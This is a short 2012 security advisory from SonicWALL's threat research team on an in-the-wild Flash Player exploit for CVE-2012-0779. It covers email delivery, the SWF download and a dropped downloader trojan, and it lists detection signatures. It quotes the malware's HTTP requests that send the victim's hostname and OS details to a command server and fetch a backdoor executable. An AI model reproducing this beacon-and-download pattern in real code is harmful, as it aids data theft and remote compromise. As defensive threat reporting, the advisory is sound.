New Adobe Flash Player exploit

May 11, 2012

SonicWALL Threats Research team observed a new Flash exploit in the wild targeting the recently patched Adobe Flash Player vulnerability - CVE-2012-0779.

The exploit arrives as an e-mail attachment and if the user opens the document it will attempt to exploit the newly patched Adobe Flash Player vulnerability. Upon successful run, it will drop and run additional malware on the victim machine.

The specially crafted document will invoke Microsoft Internet Explorer in the background to download a malicious SWF exploit file from a remote compromised server located in Korea:

The HTTP request to the remote server contains information about the compromised host name and the offset at which the malicious executable is embedded inside the document. The response contains a compressed SWF exploit file which has an ActionScript payload encrypted via DoSWF.

A quick look at the SWF exploit file metadata shows the User account & Author website information used to encrypt this file:

The embedded executable file inside the document is XOR'ed using 0x85 key and is a Downloader Trojan:

The Downloader Trojan was dropped and executed upon successful exploit run. It registers the infection on a remote site and downloads a Backdoor Trojan.

     GET /register/log.asp?isnew=-1&LocalInfo=(Operating System Information)&szHostName=(HOSTNAME)&tmp3=tmp3 Host:  GET /Include/lib/ps.exe [ Detected as PcClient.NGO_3 (Trojan) ] Host: 

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CVE-2012-0779.dc (Exploit)
  • GAV: CVE-2012-0779#swf (Exploit)
  • GAV: Mdrop.DOI (Trojan)
  • GAV: PcClient.NGO_3 (Trojan)

SonicWALL Intrusion Prevention system provides protection against this threat via the following signatures:

  • 7772 - Adobe Flash Player Object Confusion Exploit 1
  • 7773 - Adobe Flash Player Object Confusion Exploit 2